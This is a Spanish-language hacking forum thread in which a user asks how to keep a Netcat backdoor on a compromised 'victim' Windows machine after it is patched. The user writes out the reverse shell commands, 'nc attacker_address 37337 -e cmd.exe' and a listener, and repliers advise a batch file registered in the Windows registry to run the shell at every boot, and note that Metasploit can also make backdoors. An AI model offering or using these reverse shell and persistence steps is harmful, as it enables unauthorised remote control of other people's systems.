[SOLUCIONADO] Duda con NetCat

Iniciado por Rocky91, Junio 11, 2013, 06:23:19 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Junio 11, 2013, 06:23:19 PM Ultima modificación: Julio 28, 2014, 12:21:13 PM por Expermicid
Hola a todos.



Una vez que ya tengo dominado los escaneadores de vulnerabilidades, metasploit y haber ejecutado la puerta trasera con NetCat hata ahí bien.

Pero mi duda es, para ejecutar netcat desde la maquina victima, tienes que estar conectado por meterpreter, dese ahí ejecutar la shell, irte al directorio donde esta netcat y ejecutar nc dirección_atacante 37337 -e cmd.exe y en la maquina atacante nc -v -l -p 37337 y ya se establece la conexión, ¿y si al quieres conectarte otro dia directamente por nc, tienes otra vez que conectarte a metasploit ejecutar la shell y nc? no tiene sentido, por que en el momento que pongan el parche ya no puedes volver a lanar el exploit, tiene que aver algún modo que la maquina victima siempre quiera conectarse a nosotros. ¿Como?

Saludos

Claro que la hay, solo es cuestión de usar bien la imaginación.
Te puedes crear un BAT que ejecute el netcat con los parámetros e incluirlo en el registro de windows para que se ejecute siempre al iniciar el sistema. Hay muchas cosas más que puedes hacer, solo piensa en ello! El único limite es la imaginación y creatividad de cada uno.
Saludos!

CrazyKade


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Claro que la hay, solo es cuestión de usar bien la imaginación.
Te puedes crear un BAT que ejecute el netcat con los parámetros e incluirlo en el registro de windows para que se ejecute siempre al iniciar el sistema. Hay muchas cosas más que puedes hacer, solo piensa en ello! El único limite es la imaginación y creatividad de cada uno.
Saludos!

CrazyKade

Jeje gracias, la verdad es que es facil jiji tengo que pensar un poco mas jejeje. :P

Saludos

Ademas, con metasploit puedes crear un backdoor sin necesidad de usar nc.

De todas maneras, como dice @CrazyKade, esta muy bien que uses nc y uses tu imaginacion.
Eso te obligara a hacer todo un poco mas 'manual', con lo que aprenderas muchos conceptos y estrategias nuevas.

Saludos.
WhiZ


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Jeje gracias, la verdad es que es facil jiji tengo que pensar un poco mas jejeje. :P

Saludos

Venga, esa es la actitud!!! ;)